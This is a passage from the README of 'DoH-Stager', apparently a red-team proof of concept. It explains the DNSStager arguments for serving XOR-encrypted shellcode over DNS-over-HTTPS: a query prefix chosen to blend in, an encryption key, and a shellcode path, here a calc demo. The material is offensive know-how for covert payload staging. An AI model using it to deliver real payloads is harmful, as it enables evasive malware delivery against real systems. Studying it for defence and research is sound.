APTortellini/DoH-Stager/README.md

 utput ~/payload.exe --prefix emperor --sleep 1 --xorkey 0x10 --shellcode_path ~/calc-thread64.bin
 ```

+The arguments:

+- `--domain p.pacc.tortellozzi.club` is the domain that you want to use for DNSStager
+- `--payload x64/c/ipv6`is the type of payload that you want to generate, do not change this.
+- `--prefix emperor` the prexif to prepend to all the queries, find a suitable name that will blend in.
+- `--xorkey 0x10`the key used to encrypt the shellcode/payload
+- `--shellcode_path ~/calc-thread64.bin` is the shellcode that you want to serve

 Take note of the `xorkey` parameter you use, as you will need to manually copy it in the `DoHStager.cpp` file later.

 You can modify line 18 of the `DoHStager.cpp` file to use other DoH providers, the provided PoC only used Google's DNS: